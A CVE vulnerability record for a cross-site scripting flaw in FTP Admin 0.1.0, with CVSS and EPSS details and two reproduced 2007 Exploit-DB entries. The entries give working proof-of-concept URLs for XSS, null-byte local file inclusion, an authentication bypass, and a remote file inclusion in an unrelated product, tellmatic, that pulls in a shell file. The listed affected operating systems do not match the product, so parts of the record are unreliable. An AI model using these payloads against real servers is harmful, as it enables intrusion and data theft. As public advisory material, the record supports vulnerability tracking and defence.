Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-79 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4681
Publication date : 2007-11-28 23h00 +00:00
Author : Omni
EDB Verified : Yes
FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES
by Omni
1) Infos
---------
Date : 2007-11-28
Product : FTP Admin
Version : v0.1.0
Vendor : http://sourceforge.net/projects/ftpadmin/
Vendor Status : 2007-11-30 Informed!
Description : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin
requires sudo. Features include modification of users and generation of user passwords.
Source : omnipresent - omni
E-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net
Team : Playhack.net Security
2) Security Issues
-------------------
--- [ XSS ] ---
===============================================
I think that is better let you see a PoC instead of explain where is the bug.. If you want to know it just look at the
source code.
--- [ PoC ] ---
===============
http://localhost/ft/index.php?page=error&error=<b>...</b>
http://localhost/ft/index.php?page=error&error=<script>alert(1)</script>
--- [ Local File Inclusion ] ---
================================
Take a look in index.php, line 49:
include("$page.php");
Remembe that you have to log in to made local file inclusion (loggedin = true -> register_global = On)
[ Remembe that ]
if(!is_file($page . ".php") || (!is_readable($page . ".php"))) {
$page = "error";
$error = "Page does not exist or is not readable\n";
}
}
[ /Remembe that ]
--- [ PoC ] ---
===============
http://localhost/ft/index.php?page=pass.txt%00&loggedin=true
To see pass.txt ...
--- [ Admin Bypass ] ---
================================
Today I'm too lazy to explain what's wrong.. so take a look in the source code and watch the var $loggedin !!
--- [ PoC ] ---
===============
To add a user...
http://localhost/ft/index.php?page=add&loggedin=true
# milw0rm.com [2007-11-29]
Exploit Database EDB-ID : 4684
Publication date : 2007-11-30 23h00 +00:00
Author : ShAy6oOoN
EDB Verified : Yes
~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~
---------------------
Author : ShAy6oOoN
---------------------
Group : PitBull Crew
---------------------
Script : tellmatic 1.0.7
---------------------
Download : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
---------------------
Vulnerability Type : Remote File Inclusion
---------------------
Method : get
---------------------
Register_globals : On
---------------------
Exploit URL's :
---------------------
http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://localhost/shell.txt?
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r
Thanks To:
----------
str0ke
# milw0rm.com [2007-12-01]
Products Mentioned
Configuraton 0
Hp>>Hp-ux >> Version *
Hp>>Tru64 >> Version *
Ibm>>Aix >> Version *
Linux>>Linux_kernel >> Version *
Santa_cruz_operation>>Sco_unix >> Version any_version
Sgi>>Irix >> Version any_version
Sun>>Solaris >> Version *
Windriver>>Bsdos >> Version any_version
Ftp>>Admin >> Version 0.1.0
References